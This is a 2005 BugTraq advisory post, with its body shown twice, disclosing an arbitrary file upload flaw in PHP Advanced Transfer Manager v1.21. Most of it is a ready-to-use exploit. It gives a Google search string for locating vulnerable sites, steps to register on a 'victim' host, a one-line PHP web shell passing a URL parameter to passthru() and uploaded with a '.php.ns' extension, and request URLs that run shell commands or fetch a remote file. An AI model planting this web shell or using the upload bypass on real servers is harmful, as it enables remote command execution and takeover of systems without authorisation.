BugTraq
Back to list
|
Post reply
PHP Advanced Transfer Manager v1.21
May 06 2005 08:43AM
tjomi4 gmail com
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888
.88...8888.........888....888
o88o....88.o88oooo888....o888o
********************************
**** Network security team *****
********* nst.void.ru **********
********************************
* Title: PHP Advanced Transfer Manager v1.21
* Bug found by: nst
* Date: 06.05.2005
********************************
Owner: phpatm.free.fr
Google: allintitle:PHP Advanced Transfer Manager
Status: Critical
*** File upload.
1. Register :: http://victim/register.php
2. Login :: http://victim/login.php
Create file:
nst.php.ns
<pre>
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://victim/files/nst.php.ns?nst=ls -la
or
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://victim/files/nst.php.ns?nst=http://your/file.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888
.88...8888.........888....888
o88o....88.o88oooo888....o888o
********************************
**** Network security team *****
********* nst.void.ru **********
********************************
* Title: PHP Advanced Transfer Manager v1.21
* Bug found by: nst
* Date: 06.05.2005
********************************
Owner: phpatm.free.fr
Google: allintitle:PHP Advanced Transfer Manager
Status: Critical
*** File upload.
1. Register :: http://victim/register.php
2. Login :: http://victim/login.php
Create file:
nst.php.ns
<pre>
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://victim/files/nst.php.ns?nst=ls -la
or
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://victim/files/nst.php.ns?nst=http://your/file.txt
[ reply ]